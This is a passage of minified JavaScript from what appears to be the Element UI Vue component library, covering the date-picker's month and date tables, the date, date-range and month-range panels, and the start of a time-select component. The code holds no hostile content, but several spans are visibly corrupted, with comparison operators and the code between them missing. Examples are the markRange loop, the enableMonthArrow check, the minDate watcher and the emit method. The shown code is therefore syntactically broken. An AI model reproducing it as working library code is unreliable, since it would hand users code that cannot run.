t}}},Qr=Zr,Jr=o(Qr,Yr,Kr,!1,null,null,null);Jr.options.__file="packages/date-picker/src/basic/month-table.vue";var ea=Jr.exports,ta=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("table",{staticClass:"el-date-table",class:{"is-week-mode":"week"===e.selectionMode},attrs:{cellspacing:"0",cellpadding:"0"},on:{click:e.handleClick,mousemove:e.handleMouseMove}},[i("tbody",[i("tr",[e.showWeekNumber?i("th",[e._v(e._s(e.t("el.datepicker.week")))]):e._e(),e._l(e.WEEKS,(function(t,n){return i("th",{key:n},[e._v(e._s(e.t("el.datepicker.weeks."+t)))])}))],2),e._l(e.rows,(function(t,n){return i("tr",{key:n,staticClass:"el-date-table__row",class:{current:e.isWeekActive(t[1])}},e._l(t,(function(t,n){return i("td",{key:n,class:e.getCellClasses(t)},[i("div",[i("span",[e._v("\n "+e._s(t.text)+"\n ")])])])})),0)}))],2)])},ia=[];ta._withStripped=!0;var na=["sun","mon","tue","wed","thu","fri","sat"],sa=function(e){return"number"===typeof e||"string"===typeof e?Object(ar["clearTime"])(new Date(e)).getTime():e instanceof Date?Object(ar["clearTime"])(e).getTime():NaN},ra=function(e,t){var i="function"===typeof t?Object(b["arrayFindIndex"])(e,t):e.indexOf(t);return i>=0?[].concat(e.slice(0,i),e.slice(i+1)):e},aa={mixins:[g.a],props:{firstDayOfWeek:{default:7,type:Number,validator:function(e){return e>=1&&e<=7}},value:{},defaultValue:{validator:function(e){return null===e||Object(ar["isDate"])(e)||Array.isArray(e)&&e.every(ar["isDate"])}},date:{},selectionMode:{default:"day"},showWeekNumber:{type:Boolean,default:!1},disabledDate:{},cellClassName:{},minDate:{},maxDate:{},rangeState:{default:function(){return{endDate:null,selecting:!1}}}},computed:{offsetDay:function(){var e=this.firstDayOfWeek;return e>3?7-e:-e},WEEKS:function(){var e=this.firstDayOfWeek;return na.concat(na).slice(e,e+7)},year:function(){return this.date.getFullYear()},month:function(){return this.date.getMonth()},startDate:function(){return Object(ar["getStartDateOfMonth"])(this.year,this.month)},rows:function(){var e=this,t=new Date(this.year,this.month,1),i=Object(ar["getFirstDayOfMonth"])(t),n=Object(ar["getDayCountOfMonth"])(t.getFullYear(),t.getMonth()),s=Object(ar["getDayCountOfMonth"])(t.getFullYear(),0===t.getMonth()?11:t.getMonth()-1);i=0===i?7:i;for(var r=this.offsetDay,a=this.tableRows,o=1,l=this.startDate,c=this.disabledDate,u=this.cellClassName,h="dates"===this.selectionMode?Object(b["coerceTruthyValueToArray"])(this.value):[],d=sa(new Date),p=0;p<6;p++){var f=a[p];this.showWeekNumber&&(f[0]||(f[0]={type:"week",text:Object(ar["getWeekNumber"])(Object(ar["nextDate"])(l,7*p+1))}));for(var m=function(t){var a=f[e.showWeekNumber?t+1:t];a||(a={row:p,column:t,type:"normal",inRange:!1,start:!1,end:!1}),a.type="normal";var m=7*p+t,v=Object(ar["nextDate"])(l,m-r).getTime();a.inRange=v>=sa(e.minDate)&&v<=sa(e.maxDate),a.start=e.minDate&&v===sa(e.minDate),a.end=e.maxDate&&v===sa(e.maxDate);var g=v===d;if(g&&(a.type="today"),p>=0&&p<=1){var y=i+r<0?7+i+r:i+r;t+7*p>=y?a.text=o++:(a.text=s-(y-t%7)+1+7*p,a.type="prev-month")}else o<=n?a.text=o++:(a.text=o++-n,a.type="next-month");var _=new Date(v);a.disabled="function"===typeof c&&c(_),a.selected=Object(b["arrayFind"])(h,(function(e){return e.getTime()===_.getTime()})),a.customClass="function"===typeof u&&u(_),e.$set(f,e.showWeekNumber?t+1:t,a)},v=0;v<7;v++)m(v);if("week"===this.selectionMode){var g=this.showWeekNumber?1:0,y=this.showWeekNumber?7:6,_=this.isWeekActive(f[g+1]);f[g].inRange=_,f[g].start=_,f[y].inRange=_,f[y].end=_}}return a}},watch:{"rangeState.endDate":function(e){this.markRange(this.minDate,e)},minDate:function(e,t){sa(e)!==sa(t)&&this.markRange(this.minDate,this.maxDate)},maxDate:function(e,t){sa(e)!==sa(t)&&this.markRange(this.minDate,this.maxDate)}},data:function(){return{tableRows:[[],[],[],[],[],[]],lastRow:null,lastColumn:null}},methods:{cellMatchesDate:function(e,t){var i=new Date(t);return this.year===i.getFullYear()&&this.month===i.getMonth()&&Number(e.text)===i.getDate()},getCellClasses:function(e){var t=this,i=this.selectionMode,n=this.defaultValue?Array.isArray(this.defaultValue)?this.defaultValue:[this.defaultValue]:[],s=[];return"normal"!==e.type&&"today"!==e.type||e.disabled?s.push(e.type):(s.push("available"),"today"===e.type&&s.push("today")),"normal"===e.type&&n.some((function(i){return t.cellMatchesDate(e,i)}))&&s.push("default"),"day"!==i||"normal"!==e.type&&"today"!==e.type||!this.cellMatchesDate(e,this.value)||s.push("current"),!e.inRange||"normal"!==e.type&&"today"!==e.type&&"week"!==this.selectionMode||(s.push("in-range"),e.start&&s.push("start-date"),e.end&&s.push("end-date")),e.disabled&&s.push("disabled"),e.selected&&s.push("selected"),e.customClass&&s.push(e.customClass),s.join(" ")},getDateOfCell:function(e,t){var i=7*e+(t-(this.showWeekNumber?1:0))-this.offsetDay;return Object(ar["nextDate"])(this.startDate,i)},isWeekActive:function(e){if("week"!==this.selectionMode)return!1;var t=new Date(this.year,this.month,1),i=t.getFullYear(),n=t.getMonth();if("prev-month"===e.type&&(t.setMonth(0===n?11:n-1),t.setFullYear(0===n?i-1:i)),"next-month"===e.type&&(t.setMonth(11===n?0:n+1),t.setFullYear(11===n?i+1:i)),t.setDate(parseInt(e.text,10)),Object(ar["isDate"])(this.value)){var s=(this.value.getDay()-this.firstDayOfWeek+7)%7-1,r=Object(ar["prevDate"])(this.value,s);return r.getTime()===t.getTime()}return!1},markRange:function(e,t){e=sa(e),t=sa(t)||e;var i=[Math.min(e,t),Math.max(e,t)];e=i[0],t=i[1];for(var n=this.startDate,s=this.rows,r=0,a=s.length;r=e&&d<=t,u.start=e&&d===e,u.end=t&&d===t}},handleMouseMove:function(e){if(this.rangeState.selecting){var t=e.target;if("SPAN"===t.tagName&&(t=t.parentNode.parentNode),"DIV"===t.tagName&&(t=t.parentNode),"TD"===t.tagName){var i=t.parentNode.rowIndex-1,n=t.cellIndex;this.rows[i][n].disabled||i===this.lastRow&&n===this.lastColumn||(this.lastRow=i,this.lastColumn=n,this.$emit("changerange",{minDate:this.minDate,maxDate:this.maxDate,rangeState:{selecting:!0,endDate:this.getDateOfCell(i,n)}}))}}},handleClick:function(e){var t=e.target;if("SPAN"===t.tagName&&(t=t.parentNode.parentNode),"DIV"===t.tagName&&(t=t.parentNode),"TD"===t.tagName){var i=t.parentNode.rowIndex-1,n="week"===this.selectionMode?1:t.cellIndex,s=this.rows[i][n];if(!s.disabled&&"week"!==s.type){var r=this.getDateOfCell(i,n);if("range"===this.selectionMode)this.rangeState.selecting?(r>=this.minDate?this.$emit("pick",{minDate:this.minDate,maxDate:r}):this.$emit("pick",{minDate:r,maxDate:this.minDate}),this.rangeState.selecting=!1):(this.$emit("pick",{minDate:r,maxDate:null}),this.rangeState.selecting=!0);else if("day"===this.selectionMode)this.$emit("pick",r);else if("week"===this.selectionMode){var a=Object(ar["getWeekNumber"])(r),o=r.getFullYear()+"w"+a;this.$emit("pick",{year:r.getFullYear(),week:a,value:o,date:r})}else if("dates"===this.selectionMode){var l=this.value||[],c=s.selected?ra(l,(function(e){return e.getTime()===r.getTime()})):[].concat(l,[r]);this.$emit("pick",c)}}}}}},oa=aa,la=o(oa,ta,ia,!1,null,null,null);la.options.__file="packages/date-picker/src/basic/date-table.vue";var ca=la.exports,ua={mixins:[g.a],directives:{Clickoutside:V.a},watch:{showTime:function(e){var t=this;e&&this.$nextTick((function(e){var i=t.$refs.input.$el;i&&(t.pickerWidth=i.getBoundingClientRect().width+10)}))},value:function(e){"dates"===this.selectionMode&&this.value||(Object(ar["isDate"])(e)?this.date=new Date(e):this.date=this.getDefaultValue())},defaultValue:function(e){Object(ar["isDate"])(this.value)||(this.date=e?new Date(e):new Date)},timePickerVisible:function(e){var t=this;e&&this.$nextTick((function(){return t.$refs.timepicker.adjustSpinners()}))},selectionMode:function(e){"month"===e?"year"===this.currentView&&"month"===this.currentView||(this.currentView="month"):"dates"===e&&(this.currentView="date")}},methods:{proxyTimePickerDataProperties:function(){var e=this,t=function(t){e.$refs.timepicker.format=t},i=function(t){e.$refs.timepicker.value=t},n=function(t){e.$refs.timepicker.date=t},s=function(t){e.$refs.timepicker.selectableRange=t};this.$watch("value",i),this.$watch("date",n),this.$watch("selectableRange",s),t(this.timeFormat),i(this.value),n(this.date),s(this.selectableRange)},handleClear:function(){this.date=this.getDefaultValue(),this.$emit("pick",null)},emit:function(e){for(var t=this,i=arguments.length,n=Array(i>1?i-1:0),s=1;s0)||Object(ar["timeWithinRange"])(e,this.selectableRange,this.format||"HH:mm:ss")}},components:{TimePicker:Ar,YearTable:qr,MonthTable:ea,DateTable:ca,ElInput:m.a,ElButton:ae.a},data:function(){return{popperClass:"",date:new Date,value:"",defaultValue:null,defaultTime:null,showTime:!1,selectionMode:"day",shortcuts:"",visible:!1,currentView:"date",disabledDate:"",cellClassName:"",selectableRange:[],firstDayOfWeek:7,showWeekNumber:!1,timePickerVisible:!1,format:"",arrowControl:!1,userInputDate:null,userInputTime:null}},computed:{year:function(){return this.date.getFullYear()},month:function(){return this.date.getMonth()},week:function(){return Object(ar["getWeekNumber"])(this.date)},monthDate:function(){return this.date.getDate()},footerVisible:function(){return this.showTime||"dates"===this.selectionMode},visibleTime:function(){return null!==this.userInputTime?this.userInputTime:Object(ar["formatDate"])(this.value||this.defaultValue,this.timeFormat)},visibleDate:function(){return null!==this.userInputDate?this.userInputDate:Object(ar["formatDate"])(this.value||this.defaultValue,this.dateFormat)},yearLabel:function(){var e=this.t("el.datepicker.year");if("year"===this.currentView){var t=10*Math.floor(this.year/10);return e?t+" "+e+" - "+(t+9)+" "+e:t+" - "+(t+9)}return this.year+" "+e},timeFormat:function(){return this.format?Object(ar["extractTimeFormat"])(this.format):"HH:mm:ss"},dateFormat:function(){return this.format?Object(ar["extractDateFormat"])(this.format):"yyyy-MM-dd"}}},ha=ua,da=o(ha,Sr,Dr,!1,null,null,null);da.options.__file="packages/date-picker/src/panel/date.vue";var pa=da.exports,fa=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("transition",{attrs:{name:"el-zoom-in-top"},on:{"after-leave":function(t){e.$emit("dodestroy")}}},[i("div",{directives:[{name:"show",rawName:"v-show",value:e.visible,expression:"visible"}],staticClass:"el-picker-panel el-date-range-picker el-popper",class:[{"has-sidebar":e.$slots.sidebar||e.shortcuts,"has-time":e.showTime},e.popperClass]},[i("div",{staticClass:"el-picker-panel__body-wrapper"},[e._t("sidebar"),e.shortcuts?i("div",{staticClass:"el-picker-panel__sidebar"},e._l(e.shortcuts,(function(t,n){return i("button",{key:n,staticClass:"el-picker-panel__shortcut",attrs:{type:"button"},on:{click:function(i){e.handleShortcutClick(t)}}},[e._v(e._s(t.text))])})),0):e._e(),i("div",{staticClass:"el-picker-panel__body"},[e.showTime?i("div",{staticClass:"el-date-range-picker__time-header"},[i("span",{staticClass:"el-date-range-picker__editors-wrap"},[i("span",{staticClass:"el-date-range-picker__time-picker-wrap"},[i("el-input",{ref:"minInput",staticClass:"el-date-range-picker__editor",attrs:{size:"small",disabled:e.rangeState.selecting,placeholder:e.t("el.datepicker.startDate"),value:e.minVisibleDate},on:{input:function(t){return e.handleDateInput(t,"min")},change:function(t){return e.handleDateChange(t,"min")}}})],1),i("span",{directives:[{name:"clickoutside",rawName:"v-clickoutside",value:e.handleMinTimeClose,expression:"handleMinTimeClose"}],staticClass:"el-date-range-picker__time-picker-wrap"},[i("el-input",{staticClass:"el-date-range-picker__editor",attrs:{size:"small",disabled:e.rangeState.selecting,placeholder:e.t("el.datepicker.startTime"),value:e.minVisibleTime},on:{focus:function(t){e.minTimePickerVisible=!0},input:function(t){return e.handleTimeInput(t,"min")},change:function(t){return e.handleTimeChange(t,"min")}}}),i("time-picker",{ref:"minTimePicker",attrs:{"time-arrow-control":e.arrowControl,visible:e.minTimePickerVisible},on:{pick:e.handleMinTimePick,mounted:function(t){e.$refs.minTimePicker.format=e.timeFormat}}})],1)]),i("span",{staticClass:"el-icon-arrow-right"}),i("span",{staticClass:"el-date-range-picker__editors-wrap is-right"},[i("span",{staticClass:"el-date-range-picker__time-picker-wrap"},[i("el-input",{staticClass:"el-date-range-picker__editor",attrs:{size:"small",disabled:e.rangeState.selecting,placeholder:e.t("el.datepicker.endDate"),value:e.maxVisibleDate,readonly:!e.minDate},on:{input:function(t){return e.handleDateInput(t,"max")},change:function(t){return e.handleDateChange(t,"max")}}})],1),i("span",{directives:[{name:"clickoutside",rawName:"v-clickoutside",value:e.handleMaxTimeClose,expression:"handleMaxTimeClose"}],staticClass:"el-date-range-picker__time-picker-wrap"},[i("el-input",{staticClass:"el-date-range-picker__editor",attrs:{size:"small",disabled:e.rangeState.selecting,placeholder:e.t("el.datepicker.endTime"),value:e.maxVisibleTime,readonly:!e.minDate},on:{focus:function(t){e.minDate&&(e.maxTimePickerVisible=!0)},input:function(t){return e.handleTimeInput(t,"max")},change:function(t){return e.handleTimeChange(t,"max")}}}),i("time-picker",{ref:"maxTimePicker",attrs:{"time-arrow-control":e.arrowControl,visible:e.maxTimePickerVisible},on:{pick:e.handleMaxTimePick,mounted:function(t){e.$refs.maxTimePicker.format=e.timeFormat}}})],1)])]):e._e(),i("div",{staticClass:"el-picker-panel__content el-date-range-picker__content is-left"},[i("div",{staticClass:"el-date-range-picker__header"},[i("button",{staticClass:"el-picker-panel__icon-btn el-icon-d-arrow-left",attrs:{type:"button"},on:{click:e.leftPrevYear}}),i("button",{staticClass:"el-picker-panel__icon-btn el-icon-arrow-left",attrs:{type:"button"},on:{click:e.leftPrevMonth}}),e.unlinkPanels?i("button",{staticClass:"el-picker-panel__icon-btn el-icon-d-arrow-right",class:{"is-disabled":!e.enableYearArrow},attrs:{type:"button",disabled:!e.enableYearArrow},on:{click:e.leftNextYear}}):e._e(),e.unlinkPanels?i("button",{staticClass:"el-picker-panel__icon-btn el-icon-arrow-right",class:{"is-disabled":!e.enableMonthArrow},attrs:{type:"button",disabled:!e.enableMonthArrow},on:{click:e.leftNextMonth}}):e._e(),i("div",[e._v(e._s(e.leftLabel))])]),i("date-table",{attrs:{"selection-mode":"range",date:e.leftDate,"default-value":e.defaultValue,"min-date":e.minDate,"max-date":e.maxDate,"range-state":e.rangeState,"disabled-date":e.disabledDate,"cell-class-name":e.cellClassName,"first-day-of-week":e.firstDayOfWeek},on:{changerange:e.handleChangeRange,pick:e.handleRangePick}})],1),i("div",{staticClass:"el-picker-panel__content el-date-range-picker__content is-right"},[i("div",{staticClass:"el-date-range-picker__header"},[e.unlinkPanels?i("button",{staticClass:"el-picker-panel__icon-btn el-icon-d-arrow-left",class:{"is-disabled":!e.enableYearArrow},attrs:{type:"button",disabled:!e.enableYearArrow},on:{click:e.rightPrevYear}}):e._e(),e.unlinkPanels?i("button",{staticClass:"el-picker-panel__icon-btn el-icon-arrow-left",class:{"is-disabled":!e.enableMonthArrow},attrs:{type:"button",disabled:!e.enableMonthArrow},on:{click:e.rightPrevMonth}}):e._e(),i("button",{staticClass:"el-picker-panel__icon-btn el-icon-d-arrow-right",attrs:{type:"button"},on:{click:e.rightNextYear}}),i("button",{staticClass:"el-picker-panel__icon-btn el-icon-arrow-right",attrs:{type:"button"},on:{click:e.rightNextMonth}}),i("div",[e._v(e._s(e.rightLabel))])]),i("date-table",{attrs:{"selection-mode":"range",date:e.rightDate,"default-value":e.defaultValue,"min-date":e.minDate,"max-date":e.maxDate,"range-state":e.rangeState,"disabled-date":e.disabledDate,"cell-class-name":e.cellClassName,"first-day-of-week":e.firstDayOfWeek},on:{changerange:e.handleChangeRange,pick:e.handleRangePick}})],1)])],2),e.showTime?i("div",{staticClass:"el-picker-panel__footer"},[i("el-button",{staticClass:"el-picker-panel__link-btn",attrs:{size:"mini",type:"text"},on:{click:e.handleClear}},[e._v("\n "+e._s(e.t("el.datepicker.clear"))+"\n ")]),i("el-button",{staticClass:"el-picker-panel__link-btn",attrs:{plain:"",size:"mini",disabled:e.btnDisabled},on:{click:function(t){e.handleConfirm(!1)}}},[e._v("\n "+e._s(e.t("el.datepicker.confirm"))+"\n ")])],1):e._e()])])},ma=[];fa._withStripped=!0;var va=function(e){return Array.isArray(e)?[new Date(e[0]),new Date(e[1])]:e?[new Date(e),Object(ar["nextDate"])(new Date(e),1)]:[new Date,Object(ar["nextDate"])(new Date,1)]},ga={mixins:[g.a],directives:{Clickoutside:V.a},computed:{btnDisabled:function(){return!(this.minDate&&this.maxDate&&!this.selecting&&this.isValidValue([this.minDate,this.maxDate]))},leftLabel:function(){return this.leftDate.getFullYear()+" "+this.t("el.datepicker.year")+" "+this.t("el.datepicker.month"+(this.leftDate.getMonth()+1))},rightLabel:function(){return this.rightDate.getFullYear()+" "+this.t("el.datepicker.year")+" "+this.t("el.datepicker.month"+(this.rightDate.getMonth()+1))},leftYear:function(){return this.leftDate.getFullYear()},leftMonth:function(){return this.leftDate.getMonth()},leftMonthDate:function(){return this.leftDate.getDate()},rightYear:function(){return this.rightDate.getFullYear()},rightMonth:function(){return this.rightDate.getMonth()},rightMonthDate:function(){return this.rightDate.getDate()},minVisibleDate:function(){return null!==this.dateUserInput.min?this.dateUserInput.min:this.minDate?Object(ar["formatDate"])(this.minDate,this.dateFormat):""},maxVisibleDate:function(){return null!==this.dateUserInput.max?this.dateUserInput.max:this.maxDate||this.minDate?Object(ar["formatDate"])(this.maxDate||this.minDate,this.dateFormat):""},minVisibleTime:function(){return null!==this.timeUserInput.min?this.timeUserInput.min:this.minDate?Object(ar["formatDate"])(this.minDate,this.timeFormat):""},maxVisibleTime:function(){return null!==this.timeUserInput.max?this.timeUserInput.max:this.maxDate||this.minDate?Object(ar["formatDate"])(this.maxDate||this.minDate,this.timeFormat):""},timeFormat:function(){return this.format?Object(ar["extractTimeFormat"])(this.format):"HH:mm:ss"},dateFormat:function(){return this.format?Object(ar["extractDateFormat"])(this.format):"yyyy-MM-dd"},enableMonthArrow:function(){var e=(this.leftMonth+1)%12,t=this.leftMonth+1>=12?1:0;return this.unlinkPanels&&new Date(this.leftYear+t,e)=12}},data:function(){return{popperClass:"",value:[],defaultValue:null,defaultTime:null,minDate:"",maxDate:"",leftDate:new Date,rightDate:Object(ar["nextMonth"])(new Date),rangeState:{endDate:null,selecting:!1,row:null,column:null},showTime:!1,shortcuts:"",visible:"",disabledDate:"",cellClassName:"",firstDayOfWeek:7,minTimePickerVisible:!1,maxTimePickerVisible:!1,format:"",arrowControl:!1,unlinkPanels:!1,dateUserInput:{min:null,max:null},timeUserInput:{min:null,max:null}}},watch:{minDate:function(e){var t=this;this.dateUserInput.min=null,this.timeUserInput.min=null,this.$nextTick((function(){if(t.$refs.maxTimePicker&&t.maxDate&&t.maxDatethis.maxDate&&(this.maxDate=this.minDate)):(this.maxDate=Object(ar["modifyDate"])(this.maxDate,i.getFullYear(),i.getMonth(),i.getDate()),this.maxDatethis.maxDate&&(this.maxDate=this.minDate),this.$refs.minTimePicker.value=this.minDate,this.minTimePickerVisible=!1):(this.maxDate=Object(ar["modifyTime"])(this.maxDate,i.getHours(),i.getMinutes(),i.getSeconds()),this.maxDate1&&void 0!==arguments[1])||arguments[1],n=this.defaultTime||[],s=Object(ar["modifyWithTimeString"])(e.minDate,n[0]),r=Object(ar["modifyWithTimeString"])(e.maxDate,n[1]);this.maxDate===r&&this.minDate===s||(this.onPick&&this.onPick(e),this.maxDate=r,this.minDate=s,setTimeout((function(){t.maxDate=r,t.minDate=s}),10),i&&!this.showTime&&this.handleConfirm())},handleShortcutClick:function(e){e.onClick&&e.onClick(this)},handleMinTimePick:function(e,t,i){this.minDate=this.minDate||new Date,e&&(this.minDate=Object(ar["modifyTime"])(this.minDate,e.getHours(),e.getMinutes(),e.getSeconds())),i||(this.minTimePickerVisible=t),(!this.maxDate||this.maxDate&&this.maxDate.getTime()this.maxDate.getTime()&&(this.minDate=new Date(this.maxDate))},handleMaxTimeClose:function(){this.maxTimePickerVisible=!1},leftPrevYear:function(){this.leftDate=Object(ar["prevYear"])(this.leftDate),this.unlinkPanels||(this.rightDate=Object(ar["nextMonth"])(this.leftDate))},leftPrevMonth:function(){this.leftDate=Object(ar["prevMonth"])(this.leftDate),this.unlinkPanels||(this.rightDate=Object(ar["nextMonth"])(this.leftDate))},rightNextYear:function(){this.unlinkPanels?this.rightDate=Object(ar["nextYear"])(this.rightDate):(this.leftDate=Object(ar["nextYear"])(this.leftDate),this.rightDate=Object(ar["nextMonth"])(this.leftDate))},rightNextMonth:function(){this.unlinkPanels?this.rightDate=Object(ar["nextMonth"])(this.rightDate):(this.leftDate=Object(ar["nextMonth"])(this.leftDate),this.rightDate=Object(ar["nextMonth"])(this.leftDate))},leftNextYear:function(){this.leftDate=Object(ar["nextYear"])(this.leftDate)},leftNextMonth:function(){this.leftDate=Object(ar["nextMonth"])(this.leftDate)},rightPrevYear:function(){this.rightDate=Object(ar["prevYear"])(this.rightDate)},rightPrevMonth:function(){this.rightDate=Object(ar["prevMonth"])(this.rightDate)},handleConfirm:function(){var e=arguments.length>0&&void 0!==arguments[0]&&arguments[0];this.isValidValue([this.minDate,this.maxDate])&&this.$emit("pick",[this.minDate,this.maxDate],e)},isValidValue:function(e){return Array.isArray(e)&&e&&e[0]&&e[1]&&Object(ar["isDate"])(e[0])&&Object(ar["isDate"])(e[1])&&e[0].getTime()<=e[1].getTime()&&("function"!==typeof this.disabledDate||!this.disabledDate(e[0])&&!this.disabledDate(e[1]))},resetView:function(){this.minDate&&null==this.maxDate&&(this.rangeState.selecting=!1),this.minDate=this.value&&Object(ar["isDate"])(this.value[0])?new Date(this.value[0]):null,this.maxDate=this.value&&Object(ar["isDate"])(this.value[0])?new Date(this.value[1]):null}},components:{TimePicker:Ar,DateTable:ca,ElInput:m.a,ElButton:ae.a}},ba=ga,ya=o(ba,fa,ma,!1,null,null,null);ya.options.__file="packages/date-picker/src/panel/date-range.vue";var _a=ya.exports,xa=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("transition",{attrs:{name:"el-zoom-in-top"},on:{"after-leave":function(t){e.$emit("dodestroy")}}},[i("div",{directives:[{name:"show",rawName:"v-show",value:e.visible,expression:"visible"}],staticClass:"el-picker-panel el-date-range-picker el-popper",class:[{"has-sidebar":e.$slots.sidebar||e.shortcuts},e.popperClass]},[i("div",{staticClass:"el-picker-panel__body-wrapper"},[e._t("sidebar"),e.shortcuts?i("div",{staticClass:"el-picker-panel__sidebar"},e._l(e.shortcuts,(function(t,n){return i("button",{key:n,staticClass:"el-picker-panel__shortcut",attrs:{type:"button"},on:{click:function(i){e.handleShortcutClick(t)}}},[e._v(e._s(t.text))])})),0):e._e(),i("div",{staticClass:"el-picker-panel__body"},[i("div",{staticClass:"el-picker-panel__content el-date-range-picker__content is-left"},[i("div",{staticClass:"el-date-range-picker__header"},[i("button",{staticClass:"el-picker-panel__icon-btn el-icon-d-arrow-left",attrs:{type:"button"},on:{click:e.leftPrevYear}}),e.unlinkPanels?i("button",{staticClass:"el-picker-panel__icon-btn el-icon-d-arrow-right",class:{"is-disabled":!e.enableYearArrow},attrs:{type:"button",disabled:!e.enableYearArrow},on:{click:e.leftNextYear}}):e._e(),i("div",[e._v(e._s(e.leftLabel))])]),i("month-table",{attrs:{"selection-mode":"range",date:e.leftDate,"default-value":e.defaultValue,"min-date":e.minDate,"max-date":e.maxDate,"range-state":e.rangeState,"disabled-date":e.disabledDate},on:{changerange:e.handleChangeRange,pick:e.handleRangePick}})],1),i("div",{staticClass:"el-picker-panel__content el-date-range-picker__content is-right"},[i("div",{staticClass:"el-date-range-picker__header"},[e.unlinkPanels?i("button",{staticClass:"el-picker-panel__icon-btn el-icon-d-arrow-left",class:{"is-disabled":!e.enableYearArrow},attrs:{type:"button",disabled:!e.enableYearArrow},on:{click:e.rightPrevYear}}):e._e(),i("button",{staticClass:"el-picker-panel__icon-btn el-icon-d-arrow-right",attrs:{type:"button"},on:{click:e.rightNextYear}}),i("div",[e._v(e._s(e.rightLabel))])]),i("month-table",{attrs:{"selection-mode":"range",date:e.rightDate,"default-value":e.defaultValue,"min-date":e.minDate,"max-date":e.maxDate,"range-state":e.rangeState,"disabled-date":e.disabledDate},on:{changerange:e.handleChangeRange,pick:e.handleRangePick}})],1)])],2)])])},Ca=[];xa._withStripped=!0;var wa=function(e){return Array.isArray(e)?[new Date(e[0]),new Date(e[1])]:e?[new Date(e),Object(ar["nextMonth"])(new Date(e))]:[new Date,Object(ar["nextMonth"])(new Date)]},ka={mixins:[g.a],directives:{Clickoutside:V.a},computed:{btnDisabled:function(){return!(this.minDate&&this.maxDate&&!this.selecting&&this.isValidValue([this.minDate,this.maxDate]))},leftLabel:function(){return this.leftDate.getFullYear()+" "+this.t("el.datepicker.year")},rightLabel:function(){return this.rightDate.getFullYear()+" "+this.t("el.datepicker.year")},leftYear:function(){return this.leftDate.getFullYear()},rightYear:function(){return this.rightDate.getFullYear()===this.leftDate.getFullYear()?this.leftDate.getFullYear()+1:this.rightDate.getFullYear()},enableYearArrow:function(){return this.unlinkPanels&&this.rightYear>this.leftYear+1}},data:function(){return{popperClass:"",value:[],defaultValue:null,defaultTime:null,minDate:"",maxDate:"",leftDate:new Date,rightDate:Object(ar["nextYear"])(new Date),rangeState:{endDate:null,selecting:!1,row:null,column:null},shortcuts:"",visible:"",disabledDate:"",format:"",arrowControl:!1,unlinkPanels:!1}},watch:{value:function(e){if(e){if(Array.isArray(e))if(this.minDate=Object(ar["isDate"])(e[0])?new Date(e[0]):null,this.maxDate=Object(ar["isDate"])(e[1])?new Date(e[1]):null,this.minDate)if(this.leftDate=this.minDate,this.unlinkPanels&&this.maxDate){var t=this.minDate.getFullYear(),i=this.maxDate.getFullYear();this.rightDate=t===i?Object(ar["nextYear"])(this.maxDate):this.maxDate}else this.rightDate=Object(ar["nextYear"])(this.leftDate);else this.leftDate=wa(this.defaultValue)[0],this.rightDate=Object(ar["nextYear"])(this.leftDate)}else this.minDate=null,this.maxDate=null},defaultValue:function(e){if(!Array.isArray(this.value)){var t=wa(e),i=t[0],n=t[1];this.leftDate=i,this.rightDate=e&&e[1]&&i.getFullYear()!==n.getFullYear()&&this.unlinkPanels?n:Object(ar["nextYear"])(this.leftDate)}}},methods:{handleClear:function(){this.minDate=null,this.maxDate=null,this.leftDate=wa(this.defaultValue)[0],this.rightDate=Object(ar["nextYear"])(this.leftDate),this.$emit("pick",null)},handleChangeRange:function(e){this.minDate=e.minDate,this.maxDate=e.maxDate,this.rangeState=e.rangeState},handleRangePick:function(e){var t=this,i=!(arguments.length>1&&void 0!==arguments[1])||arguments[1],n=this.defaultTime||[],s=Object(ar["modifyWithTimeString"])(e.minDate,n[0]),r=Object(ar["modifyWithTimeString"])(e.maxDate,n[1]);this.maxDate===r&&this.minDate===s||(this.onPick&&this.onPick(e),this.maxDate=r,this.minDate=s,setTimeout((function(){t.maxDate=r,t.minDate=s}),10),i&&this.handleConfirm())},handleShortcutClick:function(e){e.onClick&&e.onClick(this)},leftPrevYear:function(){this.leftDate=Object(ar["prevYear"])(this.leftDate),this.unlinkPanels||(this.rightDate=Object(ar["prevYear"])(this.rightDate))},rightNextYear:function(){this.unlinkPanels||(this.leftDate=Object(ar["nextYear"])(this.leftDate)),this.rightDate=Object(ar["nextYear"])(this.rightDate)},leftNextYear:function(){this.leftDate=Object(ar["nextYear"])(this.leftDate)},rightPrevYear:function(){this.rightDate=Object(ar["prevYear"])(this.rightDate)},handleConfirm:function(){var e=arguments.length>0&&void 0!==arguments[0]&&arguments[0];this.isValidValue([this.minDate,this.maxDate])&&this.$emit("pick",[this.minDate,this.maxDate],e)},isValidValue:function(e){return Array.isArray(e)&&e&&e[0]&&e[1]&&Object(ar["isDate"])(e[0])&&Object(ar["isDate"])(e[1])&&e[0].getTime()<=e[1].getTime()&&("function"!==typeof this.disabledDate||!this.disabledDate(e[0])&&!this.disabledDate(e[1]))},resetView:function(){this.minDate=this.value&&Object(ar["isDate"])(this.value[0])?new Date(this.value[0]):null,this.maxDate=this.value&&Object(ar["isDate"])(this.value[0])?new Date(this.value[1]):null}},components:{MonthTable:ea,ElInput:m.a,ElButton:ae.a}},Sa=ka,Da=o(Sa,xa,Ca,!1,null,null,null);Da.options.__file="packages/date-picker/src/panel/month-range.vue";var $a=Da.exports,Oa=function(e){return"daterange"===e||"datetimerange"===e?_a:"monthrange"===e?$a:pa},Ea={mixins:[kr],name:"ElDatePicker",props:{type:{type:String,default:"date"},timeArrowControl:Boolean},watch:{type:function(e){this.picker?(this.unmountPicker(),this.panel=Oa(e),this.mountPicker()):this.panel=Oa(e)}},created:function(){this.panel=Oa(this.type)},install:function(e){e.component(Ea.name,Ea)}},Ta=Ea,Pa=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("transition",{attrs:{name:"el-zoom-in-top"},on:{"before-enter":e.handleMenuEnter,"after-leave":function(t){e.$emit("dodestroy")}}},[i("div",{directives:[{name:"show",rawName:"v-show",value:e.visible,expression:"visible"}],ref:"popper",staticClass:"el-picker-panel time-select el-popper",class:e.popperClass,style:{width:e.width+"px"}},[i("el-scrollbar",{attrs:{noresize:"","wrap-class":"el-picker-panel__content"}},e._l(e.items,(function(t){return i("div",{key:t.value,staticClass:"time-select-item",class:{selected:e.value===t.value,disabled:t.disabled,default:t.value===e.defaultValue},attrs:{disabled:t.disabled},on:{click:function(i){e.handleClick(t)}}},[e._v(e._s(t.value))])})),0)],1)])},Ma=[];Pa._withStripped=!0;var Na=function(e){var 